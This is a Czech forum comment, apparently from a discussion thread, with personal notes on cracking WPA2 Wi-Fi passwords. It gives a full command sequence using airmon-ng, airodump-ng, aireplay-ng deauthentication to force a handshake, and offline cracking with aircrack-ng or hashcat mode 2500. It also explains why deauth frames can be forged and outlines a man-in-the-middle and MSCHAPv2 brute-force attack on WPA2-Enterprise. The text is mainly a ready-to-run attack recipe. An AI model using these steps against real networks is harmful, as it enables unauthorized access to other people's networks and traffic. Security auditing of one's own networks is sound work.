Z mých poznámek (slovníkový, příp. u hashcatu kombinační -- asi se vyplatí zkusit všechna 8místná čísla, jinak nevím):
- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt
A existuje na to "wifite" aby člověk nemusel furt kopírovat ty MAC adresy a čísla kanálů.
frr: Handshake se dá vynutit pomocí deautentizace („odpojení“), protože tento paket je ve WPA2 nepodepsaný a můžeš ho zfalšovat pokud znáš MAC adresu AP a klienta (což odposlechneš). Klient se automaticky zkusí připojit znova a máš handshake. Útok je pak offline, je tam středně těžká PBKDF2 se SHA. /etc/shadow u wifi? Pasivní kryptografický útok na WPA2? O čem to mluvíš?!
A heslo, nebo přinejhorším jeho hash osolený SSID sítě (což je to co se ve skutečnosti používá jako kryptografický materiál) musí mít dostupný každý klient, je úplně jedno jestli Windows nebo wpa_supplicant. WPA2 (Personal) je symetrické… (a i kdyby nebylo, tak bych chtěl vidět protokol, který zajistí, že klienta nejde naklonovat)
A jinak co se týče WPA2-Enterprise, tak tam MITM na ten TLS kanál (drtivá většina klientů nebude ověřovat certifikát, protože je překvapivě komplikované to nastavit) a pak prolomit MSCHAPv2 hrubou silou (DES) nebo možná jsou na to rainbow tabulky (na něco jsou, viz crack.sh).